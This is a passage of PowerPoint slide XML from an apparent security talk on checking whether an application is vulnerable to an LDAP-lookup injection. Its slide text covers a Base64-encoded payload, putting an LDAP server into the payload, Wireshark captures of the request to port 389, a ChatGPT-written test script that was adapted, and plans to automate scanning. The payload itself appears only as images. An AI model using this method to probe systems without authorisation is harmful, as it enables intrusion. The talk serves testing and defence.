                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>ecognize the BASE64 encoded part? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB175F03-F9CF-9C11-5D89-20A75A5B94A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397495" y="4914991"/>
            <a:ext cx="9414946" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{363981B8-D9EF-B72E-9E82-64DEB4E791B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397495" y="3668704"/>
            <a:ext cx="10664451" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181147326"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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5E15E29-7271-3AB9-1FD9-748063FC2907}"/>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11C4B873-3BD6-091B-B0AB-3DAD28B6601A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1441564-9546-4D19-81BE-2C4AB4BCE9C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Testing/Running it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23D2BA77-5091-B9E1-ED31-5AA05251C2D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="1102585"/>
            <a:ext cx="7772400" cy="4453324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82672A8-ABFA-883D-1756-45DE2354941F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8487295" y="1651864"/>
            <a:ext cx="3200400" cy="3354765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>The original request is seen</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The request to port 389 is seen as well</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Of course it’s a RST, ACK as there is nothing running on that port.</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Validates the application is vulnerable and I can now display the requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3749330872"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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7D67B1B-E28D-9317-829E-1CB205F344EE}"/>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8B8F476D-90DA-AC69-E4D9-68FFADB67012}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E19C8412-BA53-E6F9-6621-CA1311B22A10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Testing/Running it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6200BE17-F9FE-CBCD-60A7-95D940AC815B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="1011252"/>
            <a:ext cx="7772400" cy="5332520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64760F73-4D87-35EA-C43E-1DD23F3CA751}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8437418" y="1180407"/>
            <a:ext cx="3516284" cy="2513509"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>The code provided by ChatGPT was slightly updated</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Put the LDAP server into the payload</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Removed all the headers and used the one that was also used on the command line</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424406476"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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B7D1A0B-EF79-20E3-CC54-A7A5D21EFF43}"/>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CAD54AA9-3D3C-32F0-F5EF-666519DE2E06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64A10656-8F82-8F34-0620-6BDAB0E75AAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Testing/Running it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D526BBF7-449E-5B04-38C5-CE15094731D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="1092236"/>
            <a:ext cx="7772400" cy="4424146"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB100C1D-C089-ACAE-7F77-32E1E0974ECD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8431902" y="1092236"/>
            <a:ext cx="3221656" cy="1672253"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Wireshark, still running, captured the request to the vulnearbale app.</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As well the request to port 389, the LDAP server, again</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3938526260"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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FDF96E1F-F917-06D9-EBFA-8C4F8B961483}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2206950" y="2835242"/>
            <a:ext cx="8166380" cy="1187516"/>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4000" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>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5400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="00B3E6"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Poppins" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Poppins" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EFBF45E-E5F4-B0E8-A808-44440AF3ED27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609975" y="900012"/>
            <a:ext cx="4972050" cy="1159668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DONE!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8EF1B44-5AB4-A53F-2F65-9A10090A2CF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609975" y="1867627"/>
            <a:ext cx="4972050" cy="115966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0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Of course not!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{715771A2-B761-14EA-C97F-100C767902AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609974" y="2835242"/>
            <a:ext cx="6060007" cy="115966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0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I am really lazy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46DFF8D0-CD3A-6E67-A790-BC1B548BCFD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2093661" y="900012"/>
            <a:ext cx="8166380" cy="4627615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3081694294"/>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B7D1A0B-EF79-20E3-CC54-A7A5D21EFF43}"/>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CAD54AA9-3D3C-32F0-F5EF-666519DE2E06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64A10656-8F82-8F34-0620-6BDAB0E75AAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Automation?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B63894D-E8A6-1D7C-D47F-F74B0BCF2DFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="1278541"/>
            <a:ext cx="4201791" cy="1528624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>What it is doing right now</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>ou need to run this manually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>You can only test one application at once</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>It’s only using a header to test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93185A44-CBB7-020B-54DD-6B5AC4564482}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1705371" y="3196354"/>
            <a:ext cx="5266185" cy="1231106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>What I really want</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-DE" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
